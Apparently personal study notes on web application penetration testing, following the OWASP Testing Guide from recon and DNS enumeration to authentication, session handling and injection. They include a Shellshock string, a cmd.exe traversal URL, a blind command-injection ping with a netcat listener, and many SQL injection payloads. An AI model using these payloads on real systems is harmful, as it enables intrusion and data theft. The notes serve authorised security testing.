# Web App Pen Testing Scripts

## Description

Supplement the tools, techniques and knowledge of this document with the OWASP [Testing Guide](https://www.owasp.org/index.php/OWASP_Testing_Guide_v4_Table_of_Contents).


## Notes

Steps:

1. Recon
2. Map
3. Scan
4. Attack

OWASP [Testing Guide](https://www.owasp.org/index.php/OWASP_Testing_Guide_v4_Table_of_Contents)
HTTP Codes -https://en.wikipedia.org/wiki/List_of_HTTP_status_codes
1xx - information, 2xx-Success, 3xx - Redirect, 4xx-Client Error, 5xx - Server Error.
304-Not modified, 401 - Unauthorized, 403-Forbidden

## Information Gathering

Methodology must be

* Proven - following this methodology (like OTG) is a proven approach
* Repeatable - results can be reproduced by testers and developers
* Explainable - Discovered problems and fixes must be related in an understandable manner

As always, get signed permission before any phase of testing begins.

Use the OWASP Testing Guide (OTG) as the sanity test/checklist as the testing process.
OTG Testing Categories

* Information Gathering (INFO)
* Configuration & Deploy (CONFIG)
* ID Mmgmt (IDENT)
* Authentication (AUTHN)
* Authorization (AUTHZ)
* Session Mgmt (SESS)
* Input Validation (INPVAL)
* Error Handling (ERR)
* Cryptography (CRYPST)
* Business Logic (BUSLOGIC)
* Client Side (CLIENT)

Primary test considerations:

* Attack platform - SamuraiWTF, Kali  
    * Kali Linux web metapackage `>apt-get update && apt-get install kali-linux-web`
    * SamuraiWTF @ [sourceforge.net](http://sourceforge.net/) - web app specific distro
* Dynamic web app security scanners - automated for rapidly scanning - not nearly as effective on web apps as network/OS vuln scanners such as Nessus.
    * HP WebInspect, Burp Pro, IBM AppScan, ZAP, Qualys WAS, Trustwave App Scanner, Acunetix WVS, Whitehat Sentinel
* Browsers - Shouldn't get in the way of testing (XSS especially), should have plenty of tools and add-ons, know the tool and how it behaves.
* Intercept Proxies - Middle ground between automated scanners and browser testing. ZAP and Burp.  Sniffers can be used for simply viewing traffic.  Sniffers may not be able to decrypt HTTPS w/o key, intercept browsers (MitM)can cause Cert Warnings (configure test browser with Root CA for the cert given by proxy.

### Intercept Proxies (30)

**Fiddler**
Free Web debugging proxy.  Runs on Windows.  Intercepts HTTP(S), purchased by Teleric in Sept 2012.  Supported extensions:

* Watcher - web sec testing tool and passive vuln scanner plug-in.  Looks at cookie settings, SSL config, info leaks, etc...
* ViewStateViewer - view and manipulate view state
* x5s - tests encodings and char transformations for XSS locations

version 2 → .Net 2.0
version 4 → .Net 4.0

**ZAP **
Free open source, fully featured. Fork of old Paros proxy.  Flagship OWASP project.

**Burp**
Commercial and open source versions.  Deeper HTTP knowledge required.  ZAP very similar in capabilities.  Components:

* Proxy
* Spider
* Intruder - Customizable attack tool
* Repeater - manipulate and repeat calls
* Sequencer - analyze session tokens and other inputs for predictability
* Decoder
* Comparer - “diff” tool

### DNS Harvesting & WHOIS

**WHOIS** protocol - client/server info about domains and IPv4/6 netblocks.  TCP port 43.  RFC3912.  Stealthier recon - passive

[whois.xxx.net](http://whois.xxx.net/)

* *afrinic*
* *apnic* Asia Pac
* *arin* (US & Can)
* *lacnic* (Mex & Latin Amer)
* *ripe* (Euro - Mid East)

`whois` command included by default on Unix/Linux, Mac but not Windows.  Whois on IP shows who is hosting, on the domain name shows the owner.  
`dig DNS21.SANS.ORG` (resolves to 66.35.59.8)
`whois 66.35.59.8`
output includes CIDER and Organization.

**DNS**
Very basic [DNS record types](http://guide.hosting-advantage.com/Advanced/Types_of_DNS_Records.htm)

UDP port 53 for payloads < 512 bytes, TCP port 53 payloads > 512 bytes (zone transfers, etc...).  Extension mechanisms may allow UPD 53 up to 4096 bytes.  There are more than 1000 DNS Top Level Domains (early 2016).

Zone Transfers - designed to allow secondary DNS servers to slave off the primary.  Entire zone is downloaded.  Shouldn't be allowed to the world, often they are (unintentionally or ISP managing on behalf of customers - internal to internal DNS ZTs allowed).

Two types:
AXFR - Full transfer
IXFR - Incremental 

`dig [www.xxxx.org](http://www.xxxx.org/) -t axfr`
following an incremental call to get the SOA record
`:~ rbacon$ dig network.org -t soa`

`; <<>> DiG 9.8.3-P1 <<>> network.org -t soa`
`;; global options: +cmd`
`;; Got answer:`
`;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 6503`
`;; flags: qr rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 0, ADDITIONAL: 0`

`;; QUESTION SECTION:`
`;network.org. IN SOA`

`;; ANSWER SECTION:`
`network.org. 3600 IN SOA ns1.iwantmyname.net. hostmaster.iwantmyname.com. 2014031700 86400 7200 3600000 3600`

Serial #,    refresh time,   retry,    expire,    ttl

Serial number in this case is `2014031700` and is a date where the last two digits are incremented each day.  00 for the first change in a day, 01 for the second, etc...Incrementing tells secondary DNS to update and mirror.  

Get the entire zone:
`dig [network.org](http://network.org/) -t ixfr=2016011700`
Make incremental zone transfer with changes made since 2016011700

Public DNS zone transfers not usually available.  Try reverse DNS (P?revTR) and Brute Force Scans.
A record: [www.network.org](http://www.network.org/) →192.168.1.8
PTR record: 192.168.1.8 → [network.org](http://network.org/)

**Reverse DNS**

1. Try a WHOIS lookup for IPs owned by the target.  
2. Then perform a reverse DNS lookup for every IP. So if the target owns 192.168.1.0/24, perform reverse DNS for 192.168.1.255

**DNS Brute Force**
“Brute Force Scans”.  Actually a dictionary attack.  Works well for virtual host discovery and for “hidden” DNS names that are not published publicly and do not have PTR records.  Scan with permission.  Most brute forcing of DNS goes unnoticed because they can handle the performance (generally - don't fill the logs and crash the server).   **DNSRecon** has a number of dictionaries to use.  /opt/dnsrecon/xxx

*  namelist.txt (1907 entries)
* subdomains-top1mil-5000.txt (5000 entries)
* subdomains-top1mil-20000.txt 

> Ryan Dewhurst conducted a DNS Zone Transfer against the top 2000 sites of the Alexa Top 1 million to create the last two lists.  Took about 5 mins with a multi-threaded Ruby script.


Useful DNS Recon Tools (60).  Some can take advantage of the word lists for bruteforcingr (dictionary)

* nslookup - universal availability, “living off the land” because compromised hosts have it. Limited functionality compared to dig.  Functionality removed from new versions.  
* dig - full featured, native to OS X and Unix/Linux, is a part of BIND.  Try the following commands on the target:
    * `$dig @<nameserver> [example.com](http://example.com/) options...`
    * Lookup all [network.org](http://network.org/) records
        * `$dig @192.168.1.8 [network.org](http://network.org/) -t any `
    * Lookup MX records
        * `$dig @192.168.1.8 [network.org](http://network.org/) -t mx`
    * Zone Transfer
        * `$dig @192.168.1.8 [network.org](http://network.org/) -t axfr`
    * Simple PTR (reverse lookup)
        * `$dig - x 192.168.1.23`
    * Query version of BIND
        * `$dig @192.168.1.8 version.bind chaos txt `
* nmap - many DNS NSE scripts (Nmap Scripting Engine), zone transfers, dns-brute.nse for finding CNAMEs - scripts usually in /usr/local/share/nmap/scripts/dns*
* DNSRecon - (Carlos Perez) Python.  Has useful wordlists, available on GitHub, tons of functionality:
    * Check all NS records for zone transfers 
    * Enum general DNS records (MX, SOA, NS, A, AAAA, SPF, AND TXT)
    * SVR record enum
    * TLD expansion
    * Bruteforce subdomain 
    * ... (65) options and switches on (66)
* Metasploit DNS info gathering modules:
    * auxiliary/gather/dns_bruteforce
    * auxiliary/gather/dns_cache_scraper (query cache for previously resolved names)
    * auxiliary/gather/dns_info (general info)
    * auxiliary/gather/dns_reverse_lookup (PTR scan for a netblock)
    * auxiliary/gather/dns_srv_enum (enum SRV records)

### Open Source Information (79)

Collect information, even without connecting to the target.  WHOIS, DNS, caching sites, and search engines.  Also, press releases, newsgroups, social networks.  Google cache if the information isn't available now.   Use search engine directives, such as “Google Dorks”.
Google:

* site:
* inurl:
* intitle:
* link:
* ext:

Bing:

* site:
* inanchor:
* intitle:
* filetype:

Notes:  use quotes for literal matches, “-” omits pages (Bing uses “Not”), “*” wildcard.
 
Tools:
**Google Hacking (83**) - DB of files containing passwords, vulnerable apps, error messages.  [https://www.exploit-db.com/google-hacking-database/?action=search&ghdb_search_cat_id=0&ghdb_search_text=alteryx](https://www.exploit-db.com/google-hacking-database/?action=search&ghdb_search_cat_id=3&ghdb_search_text=altreyx) GHDB started by Johnny Long, “Google Hacking for Pen Testers”, charity “Hackers for Charity (HFC).  Will work with other search engines with syntax adjustment.
Automate Google searches by scripting.  Google used to offer SOAP APIs but no longer support/offer keys to.  Use the Aura tool.  Replicates the old Google SOAP API to expect requests, turn them into Google searches and return the results. Does this by screen scraping.  Violates Google's terms of use so be careful to not get shunned.
Be thorough with social networking sites.  Spend much time here.  
**SHODAN (87)** - Website is a search engine for internet-connected devices.   
**FOCA (90)** - Fingerprinting Organizations with Collected Archies by ElevenPaths is primarily a metadata search tool.  Version 3.4 (2013), runs on Windows.  Free.  Still available but “killed” to be replaced by FasT professional service.
**theHarvester (93) **- Written in Python by Christian Martorella.  Automates the collection of email addresses, IP adds, domain names, and more by using search engines, PGP key servers, and the SHODAN database. Uses screen scraping and API calls.  (again, can get shunned).  
**Maltego (94) **- info mapper finds relations between people, sites, and companies.  Uses “transforms” to build a hierarchy of related info from a starting point (ie, domain name, phone number, person's name, etc...) Domain to PGP keys, Person to email, domain to phone numbers, etc...  Can save a lot of time.  Community edition limitations: Not for commercial use, max of 12 results per transform. Need to register, API keys expire every few days, runs on a slower server, communication not encrypted, ...
**Recon-ng (97)** - Automates common recon tasks.  text-based (looks and acts like metasploit) and web-based.  Dozens of modules, reporting, a few exploits as well.  Web version uses “sleep” between requests to avoid shunning.  API-based modules are faster but require API keys. Modules include:  Recon, Mapping, Discovery, Exploitation.  Use “show info” command to get more details about a mod.  
`$use `
`$show info`
Recon Mods: 4.x update changed module naming convention and organization to make more intuitive. Example, recon/contact-creds/pwnedlist uses contacts as input and attempts to output creds.
Mods for Contacts:

* `recon/contacts-social/dev_diver`: search public code repos for username comments info - look for clues about vulns.
* `recon/contacts-contacts/namechk`: uses [NameChk.com](http://namechk.com/) to validate usernames at specific websites.
* `recon/companies-contacts/linkedin_auth`:  Harvest contacts from LinkedIn API & update “contacts” db with results.
* `recon/companies-contacts/jigsaw`: Havest contacts from [Jigsaw.com](http://jigsaw.com/) and update contacts table.
* `recon/domains-contacts/pgp_search`:  Search pgp.rediris for email addresses for the given domain.

recon-ng mods for *creds - * most require API keys. Might be worth it because you can find employee accounts that have been compromised:

* recon/contacts-creds/
* recon/creds-creds/
* recon/domains-creds/pwnedlist (expensive, updates creds table with email addresses associated with leaked credentials leveraging [PwnedList.com](http://pwnedlist.com/))

recon-ng mods for *hosts* - tons of mods here because of large # of host-related services on the web `$use hosts` to see more and try.  

* recon/hosts-hosts/resolve: resolve IP for a host
* recon/domain-hosts/netcraft: check [netcraft.com](http://netcraft.com/) for host history

recon-ng mods for *geolocation*.  Recon physical location w/o being there - for physical or social engineering.  ID servers, people, photos, videos.  Create IDs, etc..., with this info.

* recon/locations-pushpins/picasa: look for picture in proximity to given location
* recon/locations-pushpins/shodan: search Shodan for hosts in proximity to location
* recon/locations-pushpins/twitter: search for tweets from area
* recon/locations-pushpins/youtube: videos from target location



### HTTP Protocol (106)

> March 12, 1989 WWW beginnings - Mike Sendall and Tim Berners-Lee created HTTP and HTML at CERN.  (ARPANET decommissioned in 1990) Late 80s early 90s most devices exposed on the Internet (office printers included)  Morris work of 1988 began to change that, first firewall DEC SEAL in 91. Circuit firwalls (2nd gen), proxies (3rd gen) around 91 and then stateful packet around 94.  Kerveros was around and one of the only encryption in use then.  mainly Telnet, FTP, r* commands.


W3 v1:  equivalent to anonymous FTP but with hyperlinks.  All data public, no auth, no encryption, sessionless, 1 server = 1 server (no multi-homed or virtual hosts)
HTTP/0.9:  GET was the only method, no other headers, was simply a single line terminated with CRLF. Response contained HTML only, no IMGs. One GET, one TCP connection.  Some web servers, like Apache, still support HTTP/0.9.
`echo -e “GET / HTTP/0.9\r\n” | nc localhost 80`

HTTP/1.0 - RFC 1945 (1996) - Added HEAD (along with GET considered “safe”) POST, PUT, and DELETE, non-HTML support for images, text, binary, etc... Still one TCP connection per GET, no virtual hosts.

HTTP/1.1 - RFC 2616 (1999 - in 2014 many more RFCs to speed up the protocol) - Virtual host support, host header mandatory, persistent conns, multiple requests via one TCP/IP socket pair, added OPTIONS method, better support for caching, proxies and compression.

HTTP/2 - RFC 7450 - Primary focus was achieving faster performance by modifying the protocol

* Binary - no longer text-based.  Better compression, reduced overhead when parsing
* Push Promise - web servers can send content before it's requested
* Multiplexed not pipelined - in 1.0 there was 1 request per resource (ie images).  Pipelining in 1.1 allows for multiple resources per single conn, however large resources such as images could “clog” the pipeline and slow it down.  2.0 requests can be sent in parallel.  HTTP Headers are compressed with HPACK (RFC 7541) to reduce impact of largely unchanging Headers with multiple requests.  HTTP/2 still does not require encryption (HTTP/S), maybe the next version?

### WebSocket

https://www.sans.org/reading-room/whitepapers/protocols/differences-html5-ajax-web-applications-35382

## 2 Configuration, Identity, Authentication

### Gathering Server Information (6)

*NMAP (6) - *Enumerate ports and ID OSes, currently 2nd gen (Summer of Code project).  Easily detected but can be slowed to help.  TCP SYN scans are stealthier because they don't open a connection.  Determines if a port is OPEN, CLOSED, or FILTERED by a firewall.
`>nmap -O -sV`  OS fingerprinting plus service version detection using headers.  
`>nmap -A` Does both

*Server Profiling* - Go deeper. Determine OS, surrounding network topology, relations with other systems.  ID HTTP stack, plugins, features, SSL support.

* Virtual server hosting (IP-based or name-based virtual host) W/O Host: header attacks will not work, but SSL support is limited because it's setup by IP address.

Multiple hosts *may* live on same IP.  Host may be obtained by looking at Host: header or default page for the IP.
Load balancers cause problems. Determine how are sessions persisted?  Some tie to a single server which is easier.

*Server Versioning* - Determine versions of components.  Be thorough and use multiple methods because tools may be inaccurate or applications may un/intentionally provide incorrect info.

1. NMAP (scripts —script=http-robots.txt to find “hidden” directories)
2. Netcat (11)
3. Headers 
4. Netcraft (13)
5. Linux case sensitive Windows not.  
6. Use Web Proxies (webserver responses may include good stuff like “X-Powered-By” & “Server”)
7. scripts 
8. etc....

### Test Software Configuration (20)

*Test [HTTP Methods](https://www.owasp.org/index.php/Test_HTTP_Methods_(OTG-CONFIG-006)).*  Could be on but used in different ways

* [GET & POST](http://www.w3schools.com/tags/ref_httpmethods.asp)
* PUT - used by WEBDAV to write files to web server.  (WebDAV is an extension to HTTP that allows reading/writing of files on a webserver)
* DELETE - used by WEBDAV to delete files from a web server
* CONNECT - Creates a TCP tunnel through the server/proxy
* TRACE - Shows the request as the server received it, including mods made by intermediary servers
* OPTIONS - displays supported methods

Use Netcat `$ echo “OPTIONS / HTTP/1.1/n/n” | nc -v [www.google.com](http://www.google.com/) 80`

*Default Pages (25). *May ID server software to determine vulns. Try accessing via IP instead of hostname to bypass named virtual hosting.

Nikto (Perl) - contains DB of vuln apps.  Even checks favicons to compare against known vulns. Finds default files.  Uses hashes to compare.  May have FPs due to the way servers handle missing pages.  Can change User Agent to mimic a browser (and probably should).
(Also, spiders and forced browsing. Vulnerability scanners)

*Shellshock* (30-49)  `( ) { : }  echo; /usr/bin/id`

### Spidering (51)

Follow links to download the entire site. Look for weaknesses, email adds, names, phone #s, keywords for password guessing, confidential data... Use many tools.  Non-standard storage format so you have to scan many times.  Tools map then scan.  Auto or Manual.  Auto may not work.  Forced browse may struggle with AJAX - prime by manually browsing.  

*robots.txt* - Tells robots (bots) what not to scan by User-agent.  Placed in web root.  Meta tags used on every page prevent caching (1&2) and to control search engines (3&4)

```
`<meta http-equiv="cache-control" content="no-cache" />
<meta http-equiv="pragma" content="no-cache" />

<meta name="robots" content="INDEX,NOFOLLOW" />
<meta name="GOOGLEBOT" content="NOARCHIVE" />`
```


*ZAP* for automated spidering.  May miss dynamically generated links or AJAX calls/links, but has AJAX spider to help.  Incorporates retired OWASP DirBuster for forced browsing to find dirs not linked to using a word list and can do 1-Entire Site 2-A single dir 3-recursively from one dir.
*Wappalyzer* - not really a spider tool but finds web app details: web server, packeged app, landguages, frameworks, APIs.  Can extend what we did with Nikto.  Firefox & Chrome extension that passively views HTML to make technology determines technology.  (Apache | Ubuntu | PHP).  Can be added to ZAP but doesn't have complete functionality
*Burp Suite* - similar to ZAP spidering Paros.  

*Wget* (53) - saves site to a dir named after website.  “Well behaved” because it listens to robots.txt unless with `-e robots=off` option. ` wget -r www.network.org -l 5` recursively spider 5 deep.

*CeWL* - Custom Word List Generator - scans website and gens a word list for password or other dictionary attacks. Uses content and EXIF metadata from images.

*Analysis* - In spider results look for Comments to useful or sensitive info:

* HTML Comments - commented code and links, disabled functionality, linked servers.  Explanation of functionality, variables.  Usernames and Passwords.
* Disabled functionality - probably not being paid attention to, may bypass auth, etc... Older or newer hidden pages. Privileged pages.  Commented code: 1) replaced by server-side code or 2) no longer used, which may be weak as it's being ignored.

### Fuzzing (91)

Examine results closely, tools can help.  Look for deviation from norm (results from spidering or forced browsing) errors, status code changes, response size...  To fuzz u need a series of attack strings.  FuzzDB & JBroFuzz and others help.

Burp Intruder (94) and ZAP tools.  Burp throttled in free version.  Attack types ([see here](https://danielmiessler.com/blog/burp-intruder-payloads/))

1. Sniper - most common.  Single payload set. each position fuzzed one at a time.  most attacks work here
2. Battering Ram - Single payload set. one set of payloads injected into all positions  
3. Pitchfork - Multiple payload sets.  fuzz each position simultaneously. good if related injections needed
4. Cluster Bomb - Multiple payload sets.  Iter through each position's payloads, like Sniper except for multi positions at once

### Information Leakage (109)

OTG-CONFIG-004 - discover if apps unintentionally expose files w/o proper access control. Info Leak flaws provide additional intel for pen test - don't lead to direct exploitation themselves, info used later.
Types:

* Valid users
* type of app or sql db in use
* DB scheme
* dir structure (403 msg to a dir)
* OS & service version
* more...

*Google Hacks/Dorks* like `site:gov intitle:”Index of” “last modified”`
Don't get Google Shunned: Immediate (captchu), short term (1-4 hours), permanent band by IP (not confirmed).   Tries to stop malicious or scripted google hacks.

Also *CVE searching* of mitre.

Auto discover using tools: Nikto, w3af, ZAP, Measploit WMAP and msfcrawler aux module.
*Wordlists*:  DIRB, DirBuster, FuzzDB JBroFuzz, WMAP

### Authentication (133)

* Basic - (RFC 2617 & 1945)
    *  Server configures Realms to ID itself, configed by the admin
    * Client Requests page, server Returns: 
        * `HTTP/1.1  **401** Auth Required`
        * `WWW-Authenticate: **Basic** realm=sans.org`
    * Return Username and password *Encoded* in Base64, not encrypted without HTTPS: 
        * `GET /adminpage/index.html HTTP/1.1`
        * `Authorization: Basic ak2asdf7fgh97sdfg576dsfg5fghdcxv765=`
    * No Account Lockout, no max login attempts, easily replayed
    * No log out without closing the browser (WAFs can mitigate some of these issues)
* Digest - (RFC 2069 - 2617) Designed to “fix” Basic Auth. (Digest mode)  About the same but hashed.
    * Quality of Protection (QOP) - flag tells client how to generate response hash
    * Client Nonce (cnonce) - unique value to hash with (salt)
        * Client generates hash1 by md5 username:realm:password
        * generate hash2 by md5 method:URI
        * md5 hash of H1:nonce:noceCount:clientNonce:qop:H2
    * HTTP Request
        * `HTTP/1.1  **401** Auth Required`
        * `WWW-Authenticate: **Digest** realm=sans.org`
        * `nonce=”BglkjsdfFDdkd345asdf”`
        * `opaque=”000000” (string of data by server to be returned untouched)`
        * `stale=false algorithm=md5 qop=auth`
    * No account lockouts, no max login attempts
    * No log out without closing the browser
    * Nonce can be predictable
    * MITM - w/o HTTPS very dangerous.  Can force browsers to downgrade to Basic Auth, easy to brute force, storage on server (ie htdigest file)
* Integrated Windows Authentication (IWA) - typically used in intranets.
    * Use Auths to machine which auths to DC.  User browses to website which requests auth.  client passes the original auth token to server.
    * Attacks focus on client machine which is always logged in.  Perfect for CSRF.
* Forms-based - HTML forms-based. Most common today.  W/O HTTPS credentials pass in plain txt.  Authentication up to developers, lots of LDAP.
    * Only as secure as developers make it.  Should use underlying frameworks w/o circumventing
    * Account lockout commonly doesn't exist.  Check for vulns (SQLi, XSS to redirect users, capturing tokens (session, cookie, others..), spoofing the site.
* OAuth - Provides access to 3rd party sites without providing credentials.  Check for information leakage (especially in JS), spoof site.
    * OAuth 1.0 - SSL not required, tokens do not expire, token must remain a secret. Try to find insecure storage, intercept generation of req to access tokens if no SSL, vulns in  service provider by disclose secret key.
    * OAuth 2.0 - requires SSL for token gen, signatures not required for API calls once token gen (SSL recommended) only one toke sent in API call and no signatures, tokens have expire time.

Other authentication forms exist but often use these for transports.  Include biometrics, token, custom, etc...

### Username Harvesting

[OTG_IDENT-004](https://www.owasp.org/index.php/Testing_for_Account_Enumeration_and_Guessable_User_Account_(OTG-IDENT-004))
Before password attacks collect usernames.   Account lockout not common in web sites, rarely monitored.
*Account Enumeration* (175)

* Check for different HTML responses: “Incorrect Username” or  “Incorrect Password” messages.
* Check for different HTTP Response variables
* Forms that repeat good usernames on refresh but empty for bad usernames
* Differences in returned HTML.  Using tools: size, codes, etc...
* Side Channel attacks:  Response time differences (EMI, heat, sound, time, CPU utilization...)
* Test password reset forms for same problems as well.
* Check for account lockout that prevents brute forcing.

## 3 Injection

### Session Tracking - (5)

HTTP stateless - webapp must implement state-tracking.  Most platforms have their own, *some developers roll their own (oportunity)*. Platform may provide but application may override. 
Tracking Methods: 

* **Cookies** (9)- Sent from server to browser as part of Header. Browser stores w/o altering. Can be marked as secure, send only via HTTPS.  Marked how long to store.  Typically limited to 50 (4KB) cookies / domain. In memory or writen to disk.  Can just have session but often has much more so server knows more about  you on next visit.
* **URL** params (10) passed via HTTP GET -  **Hidden Forms** (11) via HTTP POST
* Sometimes a combination

Types of Session (7) - Client-side: all session data sent to client, good for the attacker, can alter all variables and server will trust it.  Server-side: client mostly untrusted, data maintained on server, session ID still passed between them.

Attacker techniques:  Proxy or brute force session IDs.  XSS.

Session token gathering: browse site collecting tokens (Session IDs) to see if they're predictable - Manually (may have to because tools can't do it) (18), customized (19), Burp Suite.  Send “new” requests w/o session info will generate session IDs.  use Wget, Python, or Netcat to collect.  
ID session tokens by known session identifiers (JSESSIONID/PHPSESSIONID), some tools like Burp help, behavior like variable changing each login, deleting cookie causes session to die?

Session token predictability (17) - incremental, fixed constant, md5sum of incremental, homegrown by IP address, etc...

### Session Fixation (22)

Enables attacker to control what session ID a user is assigned.  Basic flaw is that Session ID is not regenerated at login time.  Easy.  During mapping phase test for SIDs/tokens.  Compare the ones before auth with the ones afterwards.  May have to use social engineering to convince someone to click on URL with SID.

### Authentication Bypass (25)

Access restricted content without auth.  Access functionality or accounts other than what we're supposed to have access.

* Manually browse site, try to access pages without following menus.
* Run scripts and tools to auto brute force 
* Try messing with the logic of each page.

### Command Injection (42)

[OTG-INPVAL-013](https://www.owasp.org/index.php/Testing_for_Command_Injection_(OTG-INPVAL-013))
Less common these days.  When applications send untrusted data to the interpreter.  Inject OS commands, 2 types: Local results, Remote results. Cmds obviously dependent on the underlying OS determined during mapping.  Run with the privs of the web app.  
To find look for resources that appear to be used on the system: 

* new accounts that require a directory, app accepts username param, it then runs mkdir username.
* &, &&, ||, <, >, ;,

Visible results  - results returned to the browser— or Blind results - ping your (; ping y.o.ur.ip)
`nc -lvvnp 1337`

### Dir Travers, File Inclusion, CODE INJECTION (57)

[OTG-INPVAL-012](https://www.owasp.org/index.php/Testing_for_Code_Injection_(OTG-INPVAL-012)) - Attacker can include a file.* *
*Local and Remote File Inclusion* (LFI/RFI) from the perspective of the application.  LFI - include files from the local server - information disclosure.  RFI - retrieve file from the remote server.   

*Directory Traversal *provides the ability to leave the *WEBROOT*.  Server supposed to restrict.  Load or run files from protected areas like `C:\Windows` or `/etc`.  Some simple but rare attacks include adding ../../../../../etc/shadow, other require modify encoding such as changing it to Unicode (former IIS vul wouldn't allow “/” but changing it to Unicode worked because directory constraints enforced before decoding.  Starting the URL in scripts directory required due to the default that executables must run from there.)  All servers have patches, this is typically a server implementation issue.

`http://vulnsite/scripts/../../..//winnt/system32/cmd.exe+/c+dir`
Loading config files or any files often done by developers who aren't focusing on security.  Test input to see if its testing or checking the format and function to load the file.


* Examine app for places that appear to include files (could be obvious like  ?config=../includes/config.php).  Try entering OS paths like `/etc/passwd `or `\winodws\system32\cmd.exe`. Check results which may be in the source.
* Look for params that may be the basis for a filename (like templ=red which may be /template/red.php).  Try to force it in different ways.  ie, replace the templ value with “index”.   Terminate with NULL in many langs specifies the end of a string.  The OS may ignore the rest of the string!
* Use Google Developer Tools (and of course web proxies, etc...) to check if the site is using remote files.

### SQL Injection - (80)

SQLi flaw happens because app allows user-supplied input to be dynamically employed in a generated SQL statement.  Type/version of RDBMS matters greatly.  SELECT, INSERT, UPDATE, DELETE, DROP, UNION.  Modifiers:  WHERE, AND/OR, LIMIT #1, #2 (limit rows returned to #2 many rows starting @ #1) ORDER BY.  Important types:  bool, int, char, varchar, binary (names vary across RDBMs).  

*SQL Special Chars - Simple List (85)*

* String delimiter  `'  “`
* Statement Termination ` ;`
* Comment Delims` --  #  /*`
* Wild Card  `%  *`
* Math Ops  `+  <  >  =`
* Test for eqs  `=`
* Calling Funcs   `( )`
* Null Byte  `%00`

*Quote Balancing (93).*  Balancing SQL quotes for string query values.  
*Column Balancing (94)*  INSERT and UNION require knowing how many columns there are.  UNION must pull same columns in it's SELECT as the other  SELECT... they generally have to match type as well, specifically they must be compatible/convertible.  

*Discovering* - Try anywhere there is input.  User auth is a more obvious place to try.  Many classes of SQLi.  Most common input locations:

* *GET* URL query params
* *POST* payload
* *HTTP* _Cookie_ (most likely blind SQLi)
* *HTTP* _User-Agent_ (most likely blind)

*In-Band/Inline SQLi (100) *- Allows us to see the result of SQLi.  *Blind SQLi *- Vulnerability is the same but you can't see the results.  Not a binary difference but varying degrees between the two types.  If you see error messages when testing for SQLi, then obviously it's not blind.  DB error messages themselves will probably even guide the SQLi test.  Custom messages help protect the server but may still be useful.  The DB could still be throwing errors but the application is handling them.  Look to see if some input that may break a DB call is giving a diff error msg than what would be a “good” call.  Try crafting several attacks and closely watch the messages displayed.

* Check for displayed SQL error messages - clearly the worst and can even provide some guidance for further penetration.  
    * String example: 
* Blind Injection Type (shades of grey) - Custom Error messages may wrap the DB error msg and hide the problem, but the vuln is still there.  Need to verify that there is a Dynamically generated SQL backend.   Try to replicate responses with input that is different but interpreted the same by the DB (110)  (example “Dent” as a value supplied to a username input field).
    * *Comment/ Concatenation Inference Testing*
        * Commenting:  Dent' ;#     
        * Commenting:  Dent';- -
        * Inline Commenting:   De'/*  */'nt
        * Concatenation:   De' 'nt
        * Concatenation:   De' |  | 'nt
    * *Binary/Boolean Inference Testing*
        * Dent' AND 1;#
        * Dent' AND 1=1;#
        * Dent' AND 0;#
        * Dent' AND 1=0;#  (DB will return false, could get “not found” response from app - try that with a search on ' which could also return the same message - same as line above — so test both true and false boolean tests.  This is powerful because we can now tell when DB is returning TRUE or returning FALSE)
    * *Increasing Blindness (114)*
        * `Dent' AND substr((select tablename from information_shcema.tables limit 1),1,1) > “a” ; #`
        * Checks if the first letter of the first table name starts with A.  Will return 1 if true (Dent' AND 1;#) or 0 if false (Dent' AND 0;#)
    * *Blind Time Inference (115)*  - If no discernible output from app, try timing based testing
        * `Sleep(10)` — MySQL
        * `WAITFOR DELAY '0:0:10'` — MSSQL
    * *Out-of-band (OOB) (116) (Utter Blindness) *- No error messages, no visible response, no boolean/inference opportunities.  Alt communication necessary.  Send communication to a server under our control - Burp Collaborator. Most common techniques leverages DNS or HTTP to tunnel communication.  However, if this is possible then so is high volume extraction, which makes this vuln worth pursuing.  
* If there is enough SQLi inference, try to pull all rows from table if it's a SELECT.  Try with and w/o comments.
* Determine how many columns in the target table using the ORDER BY clause repeatedly until there's an error indicating how many there are.  This provides more information about the data and table. `Dent' ORDER BY 1;#`   `Dent' ORDER BY 2;#` 
* *Current Query Disclosure* - Building upon the knowledge of the previous statement, we now know how many columns there are.  You can then try a UNION to another table such as a DB Process Table.  
    * First try Dent' UNION SELECT '1', '2', '3', '4';#  Results may show that  columns 2, 3, and 4 show fine.  Now try a union to the process table.
    * In **MySQL**, for example try: `Dent' UNION SELECT '1', '2', '3', **info** FROM **information_schema.processlist**;#` in input field (Dent' or whatever attack works for this SQLi.  Internally the statement looks like:  `SELECT * FROM customers WHERE lname='Dent' UNION SELECT '1', '2', '3', info FROM information_schema.processlist;#`

*DB Fingerprinting Detection Techniques* (129)

* Special funcs/params: `SELECT @@ version` (MySQL and SQL Server)
* Str Concat: 
    * MySQL: ` 'de' 'nt'`
    * MS SQL Server : `'De'+'nt'`
    * Oracle: `'de' || 'nt'`
* Unique Num Funcs:  
    * MySQL:  `connection_id()`, 
    * MS SQL Server: `@@pack_received`
    * Oracle: `BITAND(1,1)`

`information_schema` - (131-132) One reason we need to know DB is to point us to the DB metadata and schema info.  information_schema is an ANSI SQL92 standard but not implemented consistently if at all.  MySQL includes info for every DB.  MSSQL Server's implemented as a DB view that only shows info for the current DB.  (See page 131).  Oracle has support for `all_tables` and` all_tab_columns`

*Figuring out Databases/Table/Columns (131)*

*Stacked Queries* (133) - To expand out the scope of an attack, check to see if stacked queries are supported by the DB.  `SELECT * FROM customers WHERE lname='Dent';  CREATE TABLE exfil(data varchar(1000));--`   MSSQL Server often supports but not a given.  MySQL supports yet the way apps interface with it often limits this ability.  May not be required as you can also use UNION statements.  May not help with exfil, but still, can create, update, insert, delete and more.

*UNION-ized SQLi (137)* - Moves way beyond accessing confines of current data, allows access to arbitrary data. If access to other data is possible try UNIONs to access arbitrary data.  Essentially it provides two SELECTS.  `SELECT * FROM customers WHERE lname='Dent' UNION SELECT * FROM customers;--`  Prereqs:  Number of columns being pulled must match in the original and injected SELECT (can use ORDER BY for this).  Column data must be compatible. Need to know tables to target.  Table names must also be known.

*FROM-less SELECT Statements (139)* - May allow us to determine the number of columns.  Interprets what you send.  SELECT 1; returns 1.  SELECT CONCAT('Zap', 'hod'); returns “Zaphod”.  Most RDMS support, *Oracle does not *but has the `DUAL` dummy table for this purpose.    Using NULLs is a great way to get around not knowing field types, especially for UNIONs where the types must be compatible.  
`SELECT * FROM users WHERE lname='Dent' UNION SELECT NULL;--`
